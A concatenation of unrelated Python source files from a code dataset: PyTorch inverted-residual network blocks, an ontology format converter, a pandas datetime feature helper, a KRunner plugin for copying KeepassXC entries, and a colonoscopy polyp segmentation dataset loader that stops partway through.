class FinalLayer(nn.Module):
def __init__(self, in_chs, num_features, pad_type, norm_kwargs, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU6):
super(FinalLayer, self).__init__()
self._in_chs = in_chs
self.num_features = num_features
norm_kwargs = norm_kwargs or {}
self.conv_head = create_conv2d(self._in_chs, self.num_features, 1, padding=pad_type)
self.bn2 = norm_layer(self.num_features, **norm_kwargs)
self.act2 = act_layer(inplace=True)
def forward(self, x):
x = self.conv_head(x)
x = self.bn2(x)
x = self.act2(x)
return x
class InvertedResidual_easy(nn.Module):
def __init__(self, in_chs, num_features, pad_type, norm_kwargs, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU6):
super(InvertedResidual_easy, self).__init__()
self._in_chs = in_chs
self.num_features = num_features
norm_kwargs = norm_kwargs or {}
self.conv_head = create_conv2d(self._in_chs, self.num_features, 1, padding=pad_type)
self.bn2 = norm_layer(self.num_features, **norm_kwargs)
self.act2 = act_layer(inplace=True)
def forward(self, x):
x = self.conv_head(x)
x = self.bn2(x)
x = self.act2(x)
return x
class InvertedResidual(nn.Module):
""" Inverted residual block w/ optional SE and CondConv routing"""
def __init__(self, in_chs, out_chs, dw_kernel_size=3,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
conv_kwargs=None, drop_path_rate=0.):
super(InvertedResidual, self).__init__()
norm_kwargs = norm_kwargs or {}
conv_kwargs = conv_kwargs or {}
mid_chs = make_divisible(in_chs * exp_ratio)
has_se = se_ratio is not None and se_ratio > 0.
self.has_residual = (in_chs == out_chs and stride == 1) and not noskip
self.drop_path_rate = drop_path_rate
# Point-wise expansion
self.conv_pw = create_conv2d(in_chs, mid_chs, exp_kernel_size, padding=pad_type, **conv_kwargs)
self.bn1 = norm_layer(mid_chs, **norm_kwargs)
self.act1 = act_layer(inplace=True)
# Depth-wise convolution
self.conv_dw = create_conv2d(
mid_chs, mid_chs, dw_kernel_size, stride=stride, dilation=dilation,
padding=pad_type, depthwise=True, **conv_kwargs)
self.bn2 = norm_layer(mid_chs, **norm_kwargs)
self.act2 = act_layer(inplace=True)
# Squeeze-and-excitation
if has_se:
se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
self.se = SqueezeExcite(mid_chs, se_ratio=se_ratio, **se_kwargs)
else:
self.se = None
# Point-wise linear projection
self.conv_pwl = create_conv2d(mid_chs, out_chs, pw_kernel_size, padding=pad_type, **conv_kwargs)
self.bn3 = norm_layer(out_chs, **norm_kwargs)
def feature_info(self, location):
if location == 'expansion': # after SE, input to PWL
info = dict(module='conv_pwl', hook_type='forward_pre', num_chs=self.conv_pwl.in_channels)
else: # location == 'bottleneck', block output
info = dict(module='', hook_type='', num_chs=self.conv_pwl.out_channels)
return info
def forward(self, x):
residual = x
# Point-wise expansion
x = self.conv_pw(x)
x = self.bn1(x)
x = self.act1(x)
# Depth-wise convolution
x = self.conv_dw(x)
x = self.bn2(x)
x = self.act2(x)
# Squeeze-and-excitation
if self.se is not None:
x = self.se(x)
# Point-wise linear projection
x = self.conv_pwl(x)
x = self.bn3(x)
if self.has_residual:
if self.drop_path_rate > 0.:
x = drop_path(x, self.drop_path_rate, self.training)
x += residual
return x
class I2RGhostBlock(nn.Module):
"""
Mobile Inverted Residual Bottleneck Block
Args:
block_args (namedtuple): BlockArgs, see above
global_params (namedtuple): GlobalParam, see above
Attributes:
has_se (bool): Whether the block contains a Squeeze and Excitation layer.
"""
def __init__(self, in_chs, out_chs, dw_kernel_size=3,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
conv_kwargs=None, drop_path_rate=0., keep_3x3=False, group_1x1=1):
super().__init__()
norm_kwargs = norm_kwargs or {}
conv_kwargs = conv_kwargs or {}
mid_chs = make_divisible(in_chs * exp_ratio)
self.has_se = se_ratio is not None and se_ratio > 0.
self.has_residual = (in_chs == out_chs and stride == 1) and not noskip
self.drop_path_rate = drop_path_rate
self.expand_ratio = exp_ratio
# Get static or dynamic convolution depending on image size
# Conv2d = get_same_padding_conv2d(image_size=global_params.image_size)
Conv2d = nn.Conv2d
# Expansion phase
inp = in_chs
oup = in_chs // self.expand_ratio # number of output channels
final_oup = out_chs
self.inp, self.final_oup = inp, final_oup
self.identity = False
if oup < oup / 6.:
oup = math.ceil(oup / 6.)
oup = make_divisible(oup, 16)
oup = make_divisible(oup, 2)
k = dw_kernel_size
s = stride
# apply repeat scheme
self.split_ratio = 2
self.ghost_idx_inp = inp // self.split_ratio
self.ghost_idx_oup = int(final_oup - self.ghost_idx_inp)
self.inp, self.final_oup, self.s = inp, final_oup, s
# if self._block_args.expand_ratio != 1:
# self._expand_conv = Conv2d(in_channels=inp, out_channels=oup, kernel_size=1, bias=False)
# self._bn0 = nn.BatchNorm2d(num_features=oup, momentum=self._bn_mom, eps=self._bn_eps)
if self.expand_ratio == 2:
# self.features = nn.Sequential(
self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
bias=False, groups=in_chs)
self.bn1 = norm_layer(in_chs, **norm_kwargs)
self.act = act_layer(inplace=True)
# first linear layer
self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False)
self.bn2 = norm_layer(oup, **norm_kwargs)
# sec linear layer
self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False)
self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
# act_layer(inplace=True),
# expand layer
self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
bias=False, groups=final_oup, stride=s)
self.bn4 = norm_layer(final_oup, **norm_kwargs)
# )
elif inp != final_oup and s == 1:
# self.features=nn.Sequential(
self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
self.bn2 = norm_layer(oup, **norm_kwargs)
# only two linear layers are needed
self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn3 = norm_layer(final_oup, **norm_kwargs)
self.act = act_layer(inplace=True)
# )
elif in_chs != final_oup and s == 2:
# self.features = nn.Sequential(
self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
self.bn2 = norm_layer(oup, **norm_kwargs)
self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False)
self.bn3 = norm_layer(final_oup, **norm_kwargs)
self.act = act_layer(inplace=True)
self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
bias=False, groups=final_oup, stride=s)
self.bn4 = norm_layer(final_oup, **norm_kwargs)
# )
else:
self.identity = True
# self.features = nn.Sequential(
self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
bias=False, groups=in_chs)
self.bn1 = norm_layer(in_chs, **norm_kwargs)
self.act = act_layer(inplace=True)
self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn2 = norm_layer(oup, **norm_kwargs)
self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
# act_layer(inplace=True),
self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
bias=False, groups=final_oup)
self.bn4 = norm_layer(final_oup, **norm_kwargs)
# )
if self.has_se:
se_mode = 'large'
if se_mode == 'large':
se_frac = 0.5
se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac, **se_kwargs)
else:
se_frac = 1
se_kwargs = resolve_se_args(se_kwargs, out_chs, act_layer)
self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac / exp_ratio, **se_kwargs)
def forward(self, inputs, drop_path_rate=None):
"""
:param inputs: input tensor
:param drop_path_rate: drop path rate (float, between 0 and 1)
:return: output of block
"""
# Expansion and Depthwise Convolution
# import pdb;pdb.set_trace()
# x = self.features(inputs)
if self.expand_ratio == 2:
# first dwise conv
x = self.act(self.bn1(self.dwise_conv1(inputs)))
# first 1x1 conv
ghost_id = x[:, self.ghost_idx_inp:, :, :]
x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
# generate more features
x = torch.cat([x, ghost_id], dim=1)
# second dwise conv
x = self.bn4(self.dwise_conv2(x))
elif self.inp != self.final_oup and self.s == 1:
# first 1x1 conv
x = self.bn2(self.project_layer(inputs))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
elif self.inp != self.final_oup and self.s == 2:
# first 1x1 conv
x = self.bn2(self.project_layer(inputs))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
# second dwise conv
x = self.bn4(self.dwise_conv2(x))
else:
# first dwise conv
x = self.act(self.bn1(self.dwise_conv1(inputs)))
# first 1x1 conv
ghost_id = x[:, self.ghost_idx_inp:, :, :]
x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
# second dwise conv
x = torch.cat([x, ghost_id], dim=1)
x = self.bn4(self.dwise_conv2(x))
# Squeeze-and-excitation
if self.has_se:
x = self.se(x)
# Skip connection and drop connect
# input_filters, output_filters = self.in_chs, self.out_chs
# if self.identity and self._block_args.stride == 1 and input_filters == output_filters:
# # import pdb;pdb.set_trace()
# if drop_connect_rate:
# x = drop_connect(x, p=drop_connect_rate, training=self.training)
# x = x + inputs # skip connection
# return x
if self.identity:
if self.drop_path_rate > 0.:
x = drop_path(x, self.drop_path_rate, self.training)
x = x + inputs
return x
else:
return x
class I2RBlock(nn.Module):
"""
Mobile Inverted Residual Bottleneck Block
Args:
block_args (namedtuple): BlockArgs, see above
global_params (namedtuple): GlobalParam, see above
Attributes:
has_se (bool): Whether the block contains a Squeeze and Excitation layer.
"""
def __init__(self, in_chs, out_chs, dw_kernel_size=3,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
conv_kwargs=None, drop_path_rate=0., keep_3x3=False, group_1x1=2):
super().__init__()
norm_kwargs = norm_kwargs or {}
conv_kwargs = conv_kwargs or {}
mid_chs = make_divisible(in_chs * exp_ratio)
self.has_se = se_ratio is not None and se_ratio > 0.
self.has_residual = (in_chs == out_chs and stride == 1) and not noskip
self.drop_path_rate = drop_path_rate
self.expand_ratio = exp_ratio
# Get static or dynamic convolution depending on image size
# Conv2d = get_same_padding_conv2d(image_size=global_params.image_size)
Conv2d = nn.Conv2d
# Expansion phase
inp = in_chs
oup = in_chs // self.expand_ratio # number of output channels
final_oup = out_chs
self.inp, self.final_oup = inp, final_oup
self.identity = False
if oup < oup / 6.:
oup = math.ceil(oup / 6.)
oup = make_divisible(oup, 16)
oup = make_divisible(oup, 2)
k = dw_kernel_size
s = stride
# apply repeat scheme
self.ghost_idx_inp = inp
self.ghost_idx_oup = final_oup
self.inp, self.final_oup, self.s = inp, final_oup, s
# if self._block_args.expand_ratio != 1:
# self._expand_conv = Conv2d(in_channels=inp, out_channels=oup, kernel_size=1, bias=False)
# self._bn0 = nn.BatchNorm2d(num_features=oup, momentum=self._bn_mom, eps=self._bn_eps)
if self.expand_ratio == 2:
# self.features = nn.Sequential(
self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
bias=False, groups=in_chs)
self.bn1 = norm_layer(in_chs, **norm_kwargs)
self.act = act_layer(inplace=True)
# first linear layer
self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn2 = norm_layer(oup, **norm_kwargs)
# sec linear layer
self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
# act_layer(inplace=True),
# expand layer
self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
bias=False, groups=final_oup, stride=s)
self.bn4 = norm_layer(final_oup, **norm_kwargs)
# )
elif inp != final_oup and s == 1:
# self.features=nn.Sequential(
self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
self.bn2 = norm_layer(oup, **norm_kwargs)
# only two linear layers are needed
self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False)
self.bn3 = norm_layer(final_oup, **norm_kwargs)
self.act = act_layer(inplace=True)
# )
elif in_chs != final_oup and s == 2:
# self.features = nn.Sequential(
self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
self.bn2 = norm_layer(oup, **norm_kwargs)
self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False)
self.bn3 = norm_layer(final_oup, **norm_kwargs)
self.act = act_layer(inplace=True)
self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
bias=False, groups=final_oup, stride=s)
self.bn4 = norm_layer(final_oup, **norm_kwargs)
# )
else:
self.identity = True
# self.features = nn.Sequential(
self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
bias=False, groups=in_chs)
self.bn1 = norm_layer(in_chs, **norm_kwargs)
self.act = act_layer(inplace=True)
self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn2 = norm_layer(oup, **norm_kwargs)
self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False,
groups=group_1x1)
self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
# act_layer(inplace=True),
self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
bias=False, groups=final_oup)
self.bn4 = norm_layer(final_oup, **norm_kwargs)
# )
if self.has_se:
se_mode = 'small'
if se_mode == 'large':
se_frac = 0.5
se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac, **se_kwargs)
else:
se_frac = 1
se_kwargs = resolve_se_args(se_kwargs, out_chs, act_layer)
self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac / exp_ratio, **se_kwargs)
def forward(self, inputs, drop_path_rate=None):
"""
:param inputs: input tensor
:param drop_path_rate: drop path rate (float, between 0 and 1)
:return: output of block
"""
# Expansion and Depthwise Convolution
# import pdb;pdb.set_trace()
# x = self.features(inputs)
if self.expand_ratio == 2:
# first dwise conv
x = self.act(self.bn1(self.dwise_conv1(inputs)))
# first 1x1 conv
ghost_id = x[:, self.ghost_idx_inp:, :, :]
x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
# generate more features
x = torch.cat([x, ghost_id], dim=1)
# second dwise conv
x = self.bn4(self.dwise_conv2(x))
elif self.inp != self.final_oup and self.s == 1:
# first 1x1 conv
x = self.bn2(self.project_layer(inputs))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
elif self.inp != self.final_oup and self.s == 2:
# first 1x1 conv
x = self.bn2(self.project_layer(inputs))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
# second dwise conv
x = self.bn4(self.dwise_conv2(x))
else:
# first dwise conv
x = self.act(self.bn1(self.dwise_conv1(inputs)))
# first 1x1 conv
ghost_id = x[:, self.ghost_idx_inp:, :, :]
x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
# second 1x1 conv
x = self.act(self.bn3(self.expand_layer(x)))
# second dwise conv
x = torch.cat([x, ghost_id], dim=1)
x = self.bn4(self.dwise_conv2(x))
# Squeeze-and-excitation
if self.has_se:
x = self.se(x)
# Skip connection and drop connect
# input_filters, output_filters = self.in_chs, self.out_chs
# if self.identity and self._block_args.stride == 1 and input_filters == output_filters:
# # import pdb;pdb.set_trace()
# if drop_connect_rate:
# x = drop_connect(x, p=drop_connect_rate, training=self.training)
# x = x + inputs # skip connection
# return x
if self.identity:
if self.drop_path_rate > 0.:
x = drop_path(x, self.drop_path_rate, self.training)
x = x + inputs
return x
else:
return x
class CondConvResidual(InvertedResidual):
""" Inverted residual block w/ CondConv routing"""
def __init__(self, in_chs, out_chs, dw_kernel_size=3,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
num_experts=0, drop_path_rate=0.):
self.num_experts = num_experts
conv_kwargs = dict(num_experts=self.num_experts)
super(CondConvResidual, self).__init__(
in_chs, out_chs, dw_kernel_size=dw_kernel_size, stride=stride, dilation=dilation, pad_type=pad_type,
act_layer=act_layer, noskip=noskip, exp_ratio=exp_ratio, exp_kernel_size=exp_kernel_size,
pw_kernel_size=pw_kernel_size, se_ratio=se_ratio, se_kwargs=se_kwargs,
norm_layer=norm_layer, norm_kwargs=norm_kwargs, conv_kwargs=conv_kwargs,
drop_path_rate=drop_path_rate)
self.routing_fn = nn.Linear(in_chs, self.num_experts)
def forward(self, x):
residual = x
# CondConv routing
pooled_inputs = F.adaptive_avg_pool2d(x, 1).flatten(1)
routing_weights = torch.sigmoid(self.routing_fn(pooled_inputs))
# Point-wise expansion
x = self.conv_pw(x, routing_weights)
x = self.bn1(x)
x = self.act1(x)
# Depth-wise convolution
x = self.conv_dw(x, routing_weights)
x = self.bn2(x)
x = self.act2(x)
# Squeeze-and-excitation
if self.se is not None:
x = self.se(x)
# Point-wise linear projection
x = self.conv_pwl(x, routing_weights)
x = self.bn3(x)
if self.has_residual:
if self.drop_path_rate > 0.:
x = drop_path(x, self.drop_path_rate, self.training)
x += residual
return x
class EdgeResidual(nn.Module):
""" Residual block with expansion convolution followed by pointwise-linear w/ stride"""
def __init__(self, in_chs, out_chs, exp_kernel_size=3, exp_ratio=1.0, fake_in_chs=0,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, pw_kernel_size=1,
se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
drop_path_rate=0.):
super(EdgeResidual, self).__init__()
norm_kwargs = norm_kwargs or {}
if fake_in_chs > 0:
mid_chs = make_divisible(fake_in_chs * exp_ratio)
else:
mid_chs = make_divisible(in_chs * exp_ratio)
has_se = se_ratio is not None and se_ratio > 0.
self.has_residual = (in_chs == out_chs and stride == 1) and not noskip
self.drop_path_rate = drop_path_rate
# Expansion convolution
self.conv_exp = create_conv2d(
in_chs, mid_chs, exp_kernel_size, stride=stride, dilation=dilation, padding=pad_type)
self.bn1 = norm_layer(mid_chs, **norm_kwargs)
self.act1 = act_layer(inplace=True)
# Squeeze-and-excitation
if has_se:
se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
self.se = SqueezeExcite(mid_chs, se_ratio=se_ratio, **se_kwargs)
else:
self.se = None
# Point-wise linear projection
self.conv_pwl = create_conv2d(mid_chs, out_chs, pw_kernel_size, padding=pad_type)
self.bn2 = norm_layer(out_chs, **norm_kwargs)
def feature_info(self, location):
if location == 'expansion': # after SE, before PWL
info = dict(module='conv_pwl', hook_type='forward_pre', num_chs=self.conv_pwl.in_channels)
else: # location == 'bottleneck', block output
info = dict(module='', hook_type='', num_chs=self.conv_pwl.out_channels)
return info
def forward(self, x):
residual = x
# Expansion convolution
x = self.conv_exp(x)
x = self.bn1(x)
x = self.act1(x)
# Squeeze-and-excitation
if self.se is not None:
x = self.se(x)
# Point-wise linear projection
x = self.conv_pwl(x)
x = self.bn2(x)
if self.has_residual:
if self.drop_path_rate > 0.:
x = drop_path(x, self.drop_path_rate, self.training)
x += residual
return x
|
StarcoderdataPython
|
319326
|
from indexor.indexor import Indexor
|
StarcoderdataPython
|
171076
|
# -*- coding: utf-8 -*-
"""Miscellaneous utilities."""
import gzip
import os
from subprocess import check_output # noqa:S404
__all__ = [
"obo_to_obograph",
"obo_to_owl",
]
def obo_to_obograph(obo_path, obograph_path) -> None:
"""Convert an OBO file to OBO Graph file with pronto."""
import pronto
ontology = pronto.Ontology(obo_path)
with gzip.open(obograph_path, "wb") as file:
ontology.dump(file, format="json")
def obo_to_owl(obo_path, owl_path, owl_format: str = "ofn"):
"""Convert an OBO file to an OWL file with ROBOT."""
args = ["robot", "convert", "-i", obo_path, "-o", owl_path, "--format", owl_format]
ret = check_output( # noqa:S603
args,
cwd=os.path.dirname(__file__),
)
return ret.decode()
|
StarcoderdataPython
|
6706028
|
<reponame>Jie-Yuan/1_DataMining
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : iWork.
# @File : DateTimeFeat
# @Time : 2019-06-13 23:16
# @Author : yuanjie
# @Email : <EMAIL>
# @Software : PyCharm
# @Description :
import pandas as pd
from tqdm import tqdm
from datetime import timedelta
tqdm.pandas()
class DateTimeFeats(object):
"""
pandas_utils 时间/日期特征工程
常见格式:
1. 时间戳
2. 时间字符串
# 很强大: 解析不出为空
pd.to_datetime(ts, 'coerce', unit='s', infer_datetime_format=True)
"""
def __init__(self, include_feats=None):
"""
:param include_feats: 默认
("year", "quarter", "month", "day", "hour", "minute", "week", "weekday", "weekofyear")
weekofyear == week?
TODO: + "DayOfWeekInMonth": 当月第几周
利用python获取某年中每个月的第一天和最后一天
"""
self.time_granularity = ("year", "quarter", "month",
"day", "hour", "minute",
"week", "weekday", "weekofyear")
self.feats = include_feats if include_feats else self.time_granularity
def transform(self, s: pd.Series, add_prefix=None):
if s.name is None:
s.name = 'time_str'
if add_prefix is None:
add_prefix = f"{s.name}_"
feats = self.feats
_dtype = s.dtypes.__str__()
if _dtype.__contains__('int') or _dtype.__contains__('float'): # 时间戳 10位是秒 13位是毫秒
print("infer_datetime_format: timestamp2date")
ts = self.timestamp2date(s)
else:
print('infer_datetime_format: dateStr2date')
ts = self.dateStr2date(s)
_ = ts.progress_map(lambda t: list(self._func(t, feats)))
df_ts = pd.DataFrame(_.tolist(), columns=feats).add_prefix(add_prefix)
df_ts.insert(0, f'{s.name}2date', ts)
return df_ts
def _func(self, t, feats):
for feat in feats:
_ = t.__getattribute__(feat)
if callable(_):
yield _()
else:
yield _
def timestamp2date(self, ts):
return pd.to_datetime(ts, 'coerce', unit='s', infer_datetime_format=True)
def dateStr2date(self, ts):
try:
_ = ts.astype('datetime64[ns]')
except Exception as e:
print("astype('datetime64[ns]'): %s" % e)
_ = pd.to_datetime(ts, 'coerce', infer_datetime_format=True)
return _
def DayOfWeekInMonth(self, t):
"""
获取指定的某天是某个月的第几周
周一为一周的开始
实现思路:就是计算当天在本年的第y周,本月一1号在本年的第x周,然后求差即可。
"""
b = int((t - timedelta(t.day - 1)).strftime("%W"))
e = int(t.strftime("%W"))
return e - b + 1
if __name__ == '__main__':
import pandas as pd
ts = pd.Series([pd.datetime.today()] * 10)
print(DateTimeFeats().transform(ts))
|
StarcoderdataPython
|
1692247
|
#!/bin/env python3
import time
import signal
from gi.repository import GLib
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from setproctitle import setproctitle, setthreadtitle
from typing import List
from .clipboard import Clipboard
from .keepass import KeepassPasswords
BUS_NAME = "de.naglfar.krunner-keepassxc"
OBJ_PATH="/krunner"
IFACE="org.kde.krunner1"
class Runner(dbus.service.Object):
kp: KeepassPasswords
cp: Clipboard
empty_action: str = ""
last_match: float
def __init__(self):
DBusGMainLoop(set_as_default=True)
sessionbus = dbus.SessionBus()
sessionbus.request_name(BUS_NAME, dbus.bus.NAME_FLAG_REPLACE_EXISTING)
bus_name = dbus.service.BusName(BUS_NAME, bus=sessionbus)
dbus.service.Object.__init__(self, bus_name, OBJ_PATH)
self.kp = KeepassPasswords()
self.cp = Clipboard()
self.last_match = 0
def start(self):
setproctitle('krunner-keepassxc')
setthreadtitle('krunner-keepassxc')
loop = GLib.MainLoop()
# clear saved data 15 seconds after last krunner match call
def check_cache():
if self.last_match:
now = time.time()
if now - 15 > self.last_match:
self.last_match = 0
self.kp.clear_cache()
# return true to keep getting called, false to stop
return True
GLib.timeout_add(1000, check_cache)
# handle sigint
def sigint_handler(sig, frame):
if sig == signal.SIGINT:
print(' Quitting krunner-keepassxc')
loop.quit()
else:
raise ValueError("Undefined handler for '{}'".format(sig))
signal.signal(signal.SIGINT, sigint_handler)
# start the main loop
loop.run()
def copy_to_clipboard(self, string: str):
if string:
try:
self.cp.copy(string)
except NotImplementedError as e:
print('neither xsel nor xclip seem to be installed', flush=True)
except Exception as e:
print(str(e), flush=True)
@dbus.service.method(IFACE, out_signature='a(sss)')
def Actions(self):
# define our secondary action(s)
if len(self.kp.labels) == 0:
return []
else:
return [
('user', 'copy username', 'username-copy'),
]
@dbus.service.method(IFACE, in_signature='s', out_signature='a(sssida{sv})')
def Match(self, query: str) -> List:
matches:List = []
if len(query) > 2:
if not self.cp.can_clip:
self.cp.check_executables()
if not self.cp.can_clip:
matches = [
('', "Neither xsel nor xclip installed", "object-unlocked", 100, 0.1, {})
]
elif len(self.kp.labels) == 0:
if not self.kp.is_keepass_installed():
matches = [
('', "KeepassXC does not seem to be installed", "object-unlocked", 100, 0.1, {})
]
elif not self.kp.BUS_NAME:
matches = [
('', "DBUS bus name not found", "object-unlocked", 100, 0.1, { })
]
else:
# no passwords found, show open keepass message
matches = [
('', "No passwords or database locked", "object-unlocked", 100, 0.1, { 'subtext': 'Open KeepassXC' })
]
self.empty_action = 'open-keepassxc'
else:
# find entries that contain the query
items = [i for i in self.kp.labels if query.lower() in i.lower()]
# sort entries starting with the query on top
items.sort(key=lambda item: (not item.startswith(query), item))
# max 5 entries
items = items[:5]
matches = [
# data, display text, icon, type (Plasma::QueryType), relevance (0-1), properties (subtext, category and urls)
(item, "Copy to clipboard: " + item, "object-unlocked", 100, (1 - (i * 0.1)), { 'subtext': self.kp.get_username(item) }) for i, item in enumerate(items)
]
self.last_match = time.time()
return matches
@dbus.service.method(IFACE, in_signature='ss',)
def Run(self, matchId: str, actionId: str):
# matchId is data from Match, actionId is secondary action or empty for primary
if len(matchId) == 0:
# empty matchId means error of some kind
if self.empty_action == 'open-keepassxc':
self.kp.open_keepass()
else:
if actionId == 'user':
user = self.kp.get_username(matchId)
self.copy_to_clipboard(user)
else:
secret = self.kp.get_secret(matchId)
self.copy_to_clipboard(secret)
# clear all cached data on action
self.kp.clear_cache()
# clear last_match to skip needless check_cache
self.last_match = 0
self.empty_action = ""
|
StarcoderdataPython
|
1917257
|
<gh_stars>1-10
import os
import time
import numpy as np
from dataset_loaders.parallel_loader import ThreadedDataset
floatX = 'float32'
class Polyps912Dataset(ThreadedDataset):
'''The Endoluminal Scene Segmentation (EndoScene) of Colonoscopy Images
benchmark
The EndoScene dataset [1]_ consists of 912 frames extracted from 44
colonoscopy sequences of 36 patients. The dataset combines both CVC-ColonDB
and CVC-ClinicDB datasets of [2]_ and extends the dataset annotations to
account for 4 different semantic classes.
This loader is intended for the EndoScene dataset version containing 2
semantic classes, namely polyp and background, plus a void class annotating
the border of the images. However, it could be easily adapted to account
for 3 or 4 classes.
The dataset should be downloaded from [1]_ into the `shared_path`
(that should be specified in the config.ini according to the
instructions in ../README.md).
Parameters
----------
which_set: string
A string in ['train', 'val', 'valid', 'test'], corresponding to
the set to be returned.
References
----------
.. [1] http://adas.cvc.uab.es/endoscene/
.. [2] https://endovis.grand-challenge.org/
'''
name = 'polyps912'
non_void_nclasses = 2
_void_labels = [2]
# optional arguments
_cmap = {
0: (0, 0, 0), # Background
1: (255, 255, 255), # Polyp
2: (128, 128, 128), # Void
}
_mask_labels = {0: 'Background', 1: 'Polyp', 2: 'Void'}
_filenames = None
@property
def filenames(self):
import glob
if self._filenames is None:
# Load filenames
filenames = []
# Get file names from images folder
file_pattern = os.path.join(self.image_path, "*.bmp")
file_names = glob.glob(file_pattern)
# print (str(file_names))
# Get raw filenames from file names list
for file_name in file_names:
path, file_name = os.path.split(file_name)
file_name, ext = os.path.splitext(file_name)
filenames.append(file_name)
# print (file_name)
# Save the filenames list
self._filenames = filenames
return self._filenames
def __init__(self, which_set='train', *args, **kwargs):
# Put which_set in canonical form: training, validation or testing
if which_set in ("train", "training"):
self.which_set = "train"
elif which_set in ("val", "valid", "validation"):
self.which_set = "valid"
elif which_set in ("test", "testing"):
self.which_set = "test"
else:
raise ValueError("Unknown set requested: %s" % which_set)
# Define the images and mask paths
self.image_path = os.path.join(self.path, self.which_set, 'images')
self.mask_path = os.path.join(self.path, self.which_set, 'masks2')
super(Polyps912Dataset, self).__init__(*args, **kwargs)
def get_names(self):
"""Return a dict of names, per prefix/subset."""
return {'default': self.filenames}
def load_sequence(self, sequence):
"""Load a sequence of images/frames
Auxiliary function that loads a sequence of frames with
the corresponding ground truth and their filenames.
Returns a dict with the images in [0, 1], their corresponding
